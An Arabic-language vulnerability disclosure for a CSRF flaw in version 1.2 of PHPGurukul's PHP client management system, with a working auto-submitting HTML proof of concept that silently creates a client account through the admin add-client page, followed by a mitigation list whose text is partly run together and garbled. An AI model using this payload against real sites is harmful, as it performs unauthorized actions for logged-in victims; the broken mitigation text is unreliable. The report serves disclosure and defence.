
إثبات مفهوم يوضح ثغرة CSRF في نظام إدارة العملاء المعتمد على PHP، مع كود استغلال بلغة HTML واستراتيجيات تخفيف لاختبار أمان تطبيقات الويب.
اسم المشروع وعنوان المستودع: https://phpgurukul.com/client-management-system-using-php-mysql/
اسم الثغرة: تزوير الطلب عبر المواقع (CSRF)
الإصدار المتأثر: V1.2
توجد ثغرة تزوير الطلب عبر المواقع (CSRF) في وظيفة إضافة عميل في نظام إدارة العملاء المطور بواسطة PHPGurukul. CSRF هو هجوم يتم فيه خداع مستخدم مصادق عليه لإرسال طلب ضار إلى تطبيق ويب. يمكن أن يؤدي ذلك إلى تنفيذ إجراءات غير مصرح بها نيابة عن المستخدم. في هذا التقرير، نوضح كيف يمكن استخدام CSRF لإنشاء مستخدمين وهميين في نظام إدارة العملاء ونقترح استراتيجيات التخفيف.
باستخدام بيانات الاعتماد المقدمة، قم بتسجيل الدخول إلى نظام إدارة العملاء.



فيما يلي إثبات المفهوم (PoC) بلغة HTML لهجوم CSRF:
<html>
<body>
<form action="http://localhost/clientms/admin/add-client.php" method="POST">
<input type="hidden" name="accounttype" value="Active Account" />
<input type="hidden" name="cname" value="moulimurugan" />
<input type="hidden" name="comname" value="kppr" />
<input type="hidden" name="address" value="vijayamangalam" />
<input type="hidden" name="city" value="erode" />
<input type="hidden" name="state" value="tamil" />
<input type="hidden" name="zcode" value="638026" />
<input type="hidden" name="wphnumber" value="968560710" />
<input type="hidden" name="cellphnumber" value="6931052465" />
<input type="hidden" name="ophnumber" value="9638560410" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="password" value="moulimurugan" />
<input type="hidden" name="websiteadd" value="clientmsdb" />
<input type="hidden" name="notes" value="Nil" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>



لمنع هجمات CSRF، قم بتنفيذ الإجراءات التالية:
SameSite=Strict أو SameSite=Lax.POST للإجراءات الحساسة وتجنب معالجة طلبات GET ذات الآثار الجانبية.يوضح هذا التقرير كيف يمكن استغلال ثغرات CSRF لإنشاء عملاء غير مصرح بهم في نظام إدارة العملاء. سيساعد تنفيذ استراتيجيات التخفيف المقترحة في تأمين التطبيق ضد مثل هذه الهجمات.